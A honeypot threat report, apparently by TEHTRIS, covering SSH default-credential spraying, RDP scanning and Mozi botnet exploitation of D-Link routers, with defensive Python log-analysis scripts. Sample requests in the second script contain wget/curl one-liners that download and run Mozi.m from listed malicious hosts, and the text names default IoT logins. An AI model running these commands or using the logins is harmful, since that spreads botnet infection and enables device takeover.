TEHTRIS observed the activity on its honeypot network during week 41. Some trends remain the same as in previous weeks. For example, EternalBlue exploitation attempts account for the overwhelming majority of the activity detected by the TEHTRIS NTA solution. Similarly, the most used non-standard port remains TCP 6379, the Redis port, targeted by attempts to exploit a vulnerability on exposed instances. Finally, the IP addresses responsible for most of the malicious network activity on the honeypots are registered mainly in the Netherlands (21.76%), the United States (20%), China (12.8%) and Bulgaria (8%), as in previous weeks.
In addition to these, TEHTRIS analyzed three other types of malicious behavior this week.
SSH protocol abuse: connection attempts from 9 IP addresses with similar behavior
TEHTRIS has been monitoring the SSH protocol on its honeypot network this week. It is interesting to observe the same behavior from 9 different IP addresses:
IP address | AS | Country |
37.245.56[.]240 | AS 5384 EMIRATES TELECOMMUNICATIONS CORPORATION | AE |
84.199.203[.]118 | AS 6848 TELENET BVBA | BE |
179.129.4[.]13 | AS 26599 TELEFONICA BRASIL S.A | BR |
99.249.29[.]5 | AS 812 ROGERS-COMMUNICATIONS | CA |
119.146.57[.]210 | AS 4134 CHINANET | CN |
42.4.194[.]149 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
221.0.168[.]23 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
83.138.45[.]80 | AS 15704 XTRA TELECOM S.A. | ES |
83.23.33[.]30 | AS 5617 ORANGE POLSKA SPOLKA AKCYJNA | PL |
These IP addresses were detected one after another on the same day, attempting SSH connections with the same set of 21 logins. They mainly target Lithuanian, Finnish, Portuguese and British infrastructures. The Brazilian IP address 179.129.4[.]13 is associated with the domain name vivozap.com[.]br, which has been publicly documented in malicious activities.
Apart from the "classic" logins (root, admin, test, etc.), the following default credentials were used:
- debian / temppwd, the default credentials of the Debian images shipped for BeagleBone single-board computers
- cirros / gocubsgo or cubswin:), the default credentials of the CirrOS Linux distribution, discussed in the week 40 honeypots article
- pi / raspberry, the default credentials of older releases of Raspberry Pi OS, a free Debian-based operating system
- ethos / live, the default credentials of ethOS, an operating system optimized for mining cryptocurrencies such as Ethereum, Zcash and Monero
- miner / mmpOS, the default credentials of the mmpOS mining platform
TEHTRIS takes this opportunity to restate an essential rule of cyber hygiene: always change the default logins and passwords of any machine or software, especially those exposed on the Internet.
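As an added example (not TEHTRIS code), the following Python script shows how such a campaign can be spotted in honeypot SSH logs: it groups source IPs by the exact set of usernames they tried on the same day and flags groups of sources that share an identical set, in first-seen order, then reports which attempted username/password pairs match the default credentials listed above. The log line format and the sample lines are constructed for this example (the source addresses reuse some from the table, the rest are documentation ranges).

```python
import re
from collections import defaultdict

# Constructed sample of honeypot SSH authentication attempts (not TEHTRIS data).
# The line format "ts src=IP user=NAME pass=SECRET" is an assumption of this example.
SAMPLE_LOG = """\
2022-10-12T03:14:07Z src=37.245.56.240 user=root pass=123456
2022-10-12T03:14:09Z src=37.245.56.240 user=pi pass=raspberry
2022-10-12T03:14:11Z src=37.245.56.240 user=ethos pass=live
2022-10-12T05:02:41Z src=84.199.203.118 user=root pass=123456
2022-10-12T05:02:43Z src=84.199.203.118 user=pi pass=raspberry
2022-10-12T05:02:45Z src=84.199.203.118 user=ethos pass=live
2022-10-12T07:40:02Z src=179.129.4.13 user=root pass=123456
2022-10-12T07:40:04Z src=179.129.4.13 user=pi pass=raspberry
2022-10-12T07:40:06Z src=179.129.4.13 user=ethos pass=live
2022-10-12T09:11:30Z src=203.0.113.7 user=root pass=toor
2022-10-13T01:00:00Z src=198.51.100.9 user=root pass=123456
2022-10-13T01:00:02Z src=198.51.100.9 user=pi pass=raspberry
2022-10-13T01:00:04Z src=198.51.100.9 user=ethos pass=live
"""

# Default credentials named in the article, keyed by (username, password).
DEFAULT_CREDENTIALS = {
    ("debian", "temppwd"): "BeagleBone Debian image",
    ("cirros", "gocubsgo"): "CirrOS",
    ("cirros", "cubswin:)"): "CirrOS",
    ("pi", "raspberry"): "Raspberry Pi OS (older releases)",
    ("ethos", "live"): "ethOS",
    ("miner", "mmpOS"): "mmpOS",
}

LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S*) pass=(?P<pw>.*)$")


def parse_log(text):
    """Parse log lines into dicts; malformed lines are skipped rather than crashing."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ev = m.groupdict()
            ev["day"] = ev["ts"][:10]  # ISO date prefix, used as the grouping window
            events.append(ev)
    return events


def find_campaigns(events, min_sources=2, min_logins=2):
    """Group sources by (day, exact username set); return sets shared by several IPs.

    Sources inside a campaign are ordered by first-seen time, which makes the
    "one after another on the same day" pattern visible.
    """
    profiles = {}  # (day, src) -> [first_ts, set of usernames]
    for ev in events:
        prof = profiles.setdefault((ev["day"], ev["src"]), [ev["ts"], set()])
        prof[0] = min(prof[0], ev["ts"])  # ISO timestamps sort lexicographically
        prof[1].add(ev["user"])

    groups = defaultdict(list)
    for (day, src), (first_ts, users) in profiles.items():
        if len(users) >= min_logins:
            groups[(day, frozenset(users))].append((first_ts, src))

    campaigns = []
    for (day, users), members in groups.items():
        if len(members) >= min_sources:
            members.sort()
            campaigns.append({"day": day, "logins": sorted(users),
                              "sources": [src for _, src in members]})
    campaigns.sort(key=lambda c: (c["day"], -len(c["sources"])))
    return campaigns


def default_credential_hits(events):
    """Return (user, password, product, distinct source count) for known defaults tried."""
    seen = defaultdict(set)
    for ev in events:
        pair = (ev["user"], ev["pw"])
        if pair in DEFAULT_CREDENTIALS:
            seen[pair].add(ev["src"])
    return sorted((u, p, DEFAULT_CREDENTIALS[(u, p)], len(srcs))
                  for (u, p), srcs in seen.items())


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for c in find_campaigns(evs):
        print(f"{c['day']}: {len(c['sources'])} sources tried the same "
              f"{len(c['logins'])} logins {c['logins']} -> {', '.join(c['sources'])}")
    for user, pw, product, n in default_credential_hits(evs):
        print(f"default credential {user}/{pw} ({product}) tried by {n} source(s)")
```

Keying on the exact username set (rather than on any shared username) is what separates a coordinated spray from the background noise of unrelated scanners that all try root; raising `min_logins` filters out single-login probes, and the day window can be widened if the tooling rotates sources more slowly.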
Attempts to compromise TCP port 3389
A study of the network activity on ports other than the well-known ports (i.e. ports above 1024) shows that nearly one event in ten is a TCP request on port 3389, coming from more than 1,100 different IP addresses.
Port 3389 is the default port of the Windows Remote Desktop Protocol (RDP), which provides remote desktop access. Several vulnerabilities allowing remote code execution have been discovered in RDP, the best known being BlueKeep (CVE-2019-0708); Microsoft has since patched them. However, attacks against Remote Desktop services exposed on the Internet are still very much on the agenda: the new ransomware group nicknamed Venus, active since the summer of 2022, targets publicly exposed Remote Desktop services to gain initial access to its victims' networks.
It is therefore strongly advised not to expose port 3389 on the Internet, as it can serve as an entry point for attackers who are still actively scanning for these 2019 vulnerabilities. And there is plenty for them to scan: according to the search engine Shodan.io, over 3 million hosts still expose port 3389 on the Internet. Where remote access is genuinely needed, RDP should sit behind a VPN or a gateway rather than directly on a public address.
Continued attempts to exploit D-Link routers
Again this week, more than 100 attempts to exploit vulnerable D-Link routers were observed on the TEHTRIS honeypots. These requests were explained in more detail in the week 38 report.
The commands injected by these requests download the Mozi botnet payload (file Mozi.m) from one of 35 different malicious servers:
IP address | Port | AS | Country |
179.43.175[.]5 | – | AS 51852 PRIVATE LAYER INC | CH |
179.43.163[.]105 | – | AS 51852 PRIVATE LAYER INC | CH |
112.28.39[.]234 | 39756 | AS 9808 CHINA MOBILE COMMUNICATIONS GROUP CO., LTD. | CN |
113.25.203[.]184 | 48048 | AS 4134 CHINANET | CN |
115.48.217[.]218 | 38272 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
115.54.232[.]252 | 58935 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
115.60.60[.]195 | 37077 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
119.187.195[.]140 | 34387 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
120.83.79[.]34 | 39639 | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE | CN |
124.42.176[.]117 | 39864 | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE | CN |
125.106.159[.]51 | 38498 | AS 4134 CHINANET | CN |
125.117.106[.]167 | 37185 | AS 4134 CHINANET | CN |
125.47.212[.]63 | 45960 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
163.179.233[.]138 | 55458 | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE | CN |
221.14.111[.]125 | 49504 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
27.215.70[.]186 | 56740 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
42.227.237[.]130 | 52788 | AS 4837 CHINA UNICOM CHINA169 BACKBONE | CN |
58.252.164[.]133 | 56207 | AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE | CN |
60.179.68[.]181 | 33989 | AS 4134 CHINANET | CN |
61.3.188[.]115 | 44589 | AS 9829 NATIONAL INTERNET BACKBONE | CN |
61.53.17[.]13 | 53424 | AS 9829 NATIONAL INTERNET BACKBONE | CN |
103.121.174[.]129 | 54040 | AS 137655 ANGEL AIR NETWORK SOLUTIONS PVT. LTD. | IN |
103.183.33[.]71 | 47628 | AS 133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED | IN |
117.201.203[.]112 | 37600 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
117.215.240[.]15 | 55856 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
117.216.18[.]64 | 38915 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
117.221.127[.]246 | 45314 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
202.164.136[.]104 | 40553 | AS 17465 CABLE ISP IN INDIA | IN |
210.89.58[.]184 | 33620 | AS 133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED | IN |
223.130.30[.]142 | 37215 | AS 133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED | IN |
223.130.30[.]166 | 53165 | AS 133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED | IN |
59.99.200[.]114 | 51145 | AS 9829 NATIONAL INTERNET BACKBONE | IN |
1.246.222[.]6 | 1473 | AS 9318 SK BROADBAND CO LTD | KR |
82.151.125[.]134 | 47150 | AS 12389 ROSTELECOM | RU |
102.33.108[.]55 | 51151 | AS 327782 METROFIBRE-NETWORX | ZA |
Five of the IP addresses hosted by AS 4837 CHINA UNICOM are associated with the same domain name, hn.kd.ny[.]adsl, a generic name for a consumer ADSL pool, which is consistent with infected home routers rather than dedicated hosting.
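As an added example (not TEHTRIS code and not the week 38 analysis), here is a Python helper that does the first step behind a table like the one above: it extracts the download server from captured exploitation requests. It URL-decodes each request, keeps only URLs pulled by a wget or curl command (so an unrelated URL such as an HNAP SOAPAction namespace is ignored), defangs the host in the `1.2.3[.]4` style used on this page and counts hits per host and port. The sample requests are constructed for this example; their shell one-liner follows the usual form of these injections and the hosts reuse entries from the table.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Constructed request captures (not from the page). The injected one-liner
# "cd /tmp; wget http://HOST:PORT/Mozi.m; ..." is the typical shape; the
# target address 192.0.2.10 is a documentation address.
SAMPLE_REQUESTS = [
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.10\r\n"
    "SOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings\"\r\n\r\n"
    "`cd /tmp; wget http://112.28.39.234:39756/Mozi.m; chmod 777 Mozi.m; ./Mozi.m`",
    "GET /cgi-bin/test.cgi?cmd=cd%20/tmp;wget%20http://179.43.175.5/Mozi.m;sh%20Mozi.m HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n\r\n",
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"
    "`cd /tmp; curl -O http://112.28.39.234:39756/Mozi.m; sh Mozi.m`",
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.10\r\n\r\n"
    "`cd /tmp; wget http://1.246.222.6:1473/Mozi.m; chmod +x Mozi.m; ./Mozi.m`",
]

# Only a URL that a fetch command actually pulls is a download server; the URL
# stops at shell separators and quotes so "...;chmod" is not swallowed.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b[^;|&`\n]*?((?:https?|ftp)://[^\s;|&'\"`<>()]+)")


def extract_download_urls(raw_request):
    """Return the URLs fetched by wget/curl commands found in a captured request."""
    text = unquote(raw_request)  # decode %20 etc. so GET-parameter payloads are visible
    urls = []
    for match in FETCH_RE.findall(text):
        parts = urlsplit(match)
        try:
            port = parts.port  # None when the URL carries no explicit port
        except ValueError:     # malformed port, e.g. "host:abc"
            continue
        if parts.hostname:
            urls.append({"scheme": parts.scheme, "host": parts.hostname,
                         "port": port, "file": parts.path.rsplit("/", 1)[-1]})
    return urls


def defang(host):
    """Write 1.2.3.4 as 1.2.3[.]4 so the indicator is neither clickable nor resolvable."""
    head, sep, tail = host.rpartition(".")
    return f"{head}[.]{tail}" if sep else host


def summarize_download_servers(requests):
    """Aggregate download servers as rows of defanged host, port (or '-'), files, hits."""
    stats = defaultdict(lambda: {"files": set(), "hits": 0})
    for raw in requests:
        for u in extract_download_urls(raw):
            entry = stats[(u["host"], u["port"])]
            entry["hits"] += 1
            entry["files"].add(u["file"])
    rows = [{"host": defang(host), "port": port if port is not None else "-",
             "files": sorted(entry["files"]), "hits": entry["hits"]}
            for (host, port), entry in stats.items()]
    rows.sort(key=lambda r: (-r["hits"], r["host"]))
    return rows


if __name__ == "__main__":
    for row in summarize_download_servers(SAMPLE_REQUESTS):
        print(f"{row['host']} | {row['port']} | {', '.join(row['files'])} | {row['hits']} hit(s)")
```

The AS and country columns of the page's table come from a separate lookup (whois/GeoIP) on the plain host, done after extraction; the defanged form is only for reporting. Counting hits per host:port rather than per host matters here because the same address can host several short-lived download ports.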
TEHTRIS recommends always applying updates, including router firmware updates, as soon as they become available.